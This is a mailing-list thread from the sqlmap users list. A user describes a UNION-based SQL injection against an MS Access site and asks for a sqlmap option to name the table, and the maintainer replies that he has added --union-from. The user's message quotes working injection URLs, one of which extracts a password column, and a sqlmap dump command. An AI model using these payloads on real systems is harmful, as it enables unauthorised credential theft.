Hi Buawig.
Implemented as requested [1].
Now, in your case, you can (e.g.) use --union-from=foobar which will
enforce usage of table name foobar in UNION query injection payloads.
Kind regards,
Miroslav Stampar
[1] https://github.com/sqlmapproject/sqlmap/issues/423
On Tue, Mar 19, 2013 at 8:34 PM, buawig <bua...@gmail.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> Hi,
>
> I've got a simple union based sqli (resulting webpage shows only one
> entry/row).
>
> Valid statements that show the numbers in the resulting html page:
>
> ...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
> ...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
>
> - - foobar is an existing table (gathered via error messages in html)
> - - password is a valid column in the foobar table
>
> The following URL gives you one password:
>
> ...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13
> from foobar
>
>
> Now I wanted to hand over to sqlmap to dump all passwords:
>
> sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password
> - --dump
>
> which did not work out (0 entries retrieved), but it was confirmed
> that the table has several hundred entries.
>
> - - sqlmap was able to detect the number of columns is 13 (correct)
> - - sqlmap confirmed a bolean-based blind sqli vulnerability (but no
> UNION based sqli)
> - - sqlmap was able to confirm the existence of table name (with --tables)
> (echo foobar > txt/common-tables.txt)
> - - sqlmap was able to confirm the existence of column name password
> (with --colums)
>
> When running something like:
> - --technique=U --union-cols=13 --union-char=1
>
> sqlmap requested something *like*:
>
> ...id=-123 union all select
> 1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from
> MSysAccessObjects%00
>
> which results in the following error message (shown in the html page):
>
> The Microsoft Jet database engine cannot find the input table or query
> 'MSysAccessObjects'. Make sure it exists and that its name is spelled
> correctly.
>
> So if sqlmap would accept a known tablename on the command line that
> it would use to detect/confirm the union based sqli vuln, instead of
> using "MSysAccessObjects" this would make sqlmap more useful
> (or simply use the table name specified in -T or previously
> bruteforced to detect union-based sqli).
>
> thanks!
>
> PS: I did *not* run sqlmap with special --risk/--level because I don't
> want to send several unneeded http requests if the vulnerability is
> already confirmed (manually). I'm using sqlmap mainly for exploitation
> (not so much for detection) and would appreciate if the user could
> tell sqlmap how to exploit a certain sqli (something that is already
> partially given with --technique, --union-cols, --union-chars).
>
> I did use 1.0-dev-d1ae62b.
>
> ref:
> http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
>
> http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html
> -----BEGIN PGP SIGNATURE-----
>
> iQIcBAEBCgAGBQJRSL3LAAoJEJeRHQyF0ukMFLsP/3OdDtcE5K+6AttmQhmadyum
> 0/yDLbtTS06W6iW1iguuvPL/Kva6gURynOrwEh/eD+AOPVVBUD6vjjHx9Z8R4XLO
> 8OrOWqQ6xe7ppjsU3ThXy550vFD/n62DgNjsM/JkwTFicSki4+JYwbmE9CPjfSfk
> mRmLadOP4/iU7m+s3bv6f58jTUO6YdPOqR3yEWuES5k+sL+7QDDPPk8fEqbvKuxw
> JK2yYsa5ZmP78GW9s7Gg1BjnMI51G3NbNI0ZdZllFm2APwSw9R+13YzXwtp0V6oJ
> L+SDZJ0ZIJLEw133F/eoASVTQMZICz/K494KmXWlv68ac9TLmrvRGcis7o6FdGE1
> lUa5LC7ddNE7Z21g83miC4CaG4JUqXxQ2kdW1HW7joLGHl+Gi45gr0A+t6QmRVOl
> njOM/2O3wBDfaif68Equ9+Bm1JK5DzVEwu0mMBUrKNEfynR1PvU6/T7R/f1Ogu8p
> 8H32HtwGQLowwNYbHz3SMk0ecY9lVOAhIAA6afz0YTuyh777cVJCq7YmgTXBUlpQ
> zqEO72FGTyObOnbYhGE8dN6TdfsCk0Fdl5VJC3TTHoLRtRuQC7WzxZktwETl6Jxy
> dOjG2MpjMdtu3zR07WzuroRdrgFhnonb1Wq7BWDDKgB6kFrH80GMYt0hpNJ9mY0c
> 0p/jGfV1aHnEBhy3KpXe
> =Q1R5
> -----END PGP SIGNATURE-----
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_mar
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Everyone hates slow websites. So do we.
Make your web apps faster with AppDynamics
Download AppDynamics Lite for free today:
http://p.sf.net/sfu/appdyn_d2d_mar
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
